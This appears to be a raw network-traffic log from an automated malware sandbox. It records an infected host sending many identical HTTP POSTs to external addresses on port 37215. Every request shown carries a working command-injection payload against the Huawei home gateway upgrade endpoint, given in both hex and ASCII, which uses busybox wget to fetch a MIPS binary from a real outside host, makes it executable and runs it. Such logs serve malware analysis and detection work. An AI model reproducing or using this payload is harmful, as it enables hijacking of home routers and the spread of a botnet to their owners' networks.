2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1108192.168.2.1357902197.255.251.10437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.771387100 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1109192.168.2.133704641.78.128.13037215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.775008917 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1110192.168.2.135525441.82.83.19237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.778089046 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1111192.168.2.1341154197.223.216.13637215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.780618906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1112192.168.2.1349382156.245.171.24737215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.783158064 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1113192.168.2.133555041.4.214.18537215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.785569906 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1114192.168.2.1348254156.134.22.3437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.789200068 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1115192.168.2.135744041.227.170.8337215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.792759895 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1116192.168.2.1345916197.95.238.6437215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.796302080 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1117192.168.2.1352224197.72.51.10237215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.799204111 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
                            Connection: keep-alive
                            Accept: */*
                            Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                            Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 34 2e 31 35 36 2e 37 31 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 74 34 70 64 65 66 61 75 6c 74 2f 74 34 70 30 6e 74 30 37 [TRUNCATED]
                            Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 94.156.71.59 -l /tmp/.unstable -r /t4t4t4t4t4t4t4t4t4t4t4t4t4pdefault/t4p0nt07.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                            Session IDSource IPSource PortDestination IPDestination Port
                            1118192.168.2.1346862156.77.125.11837215
                            TimestampBytes transferredDirectionData
                            Jun 10, 2024 15:38:03.801716089 CEST889OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                            Content-Length: 430
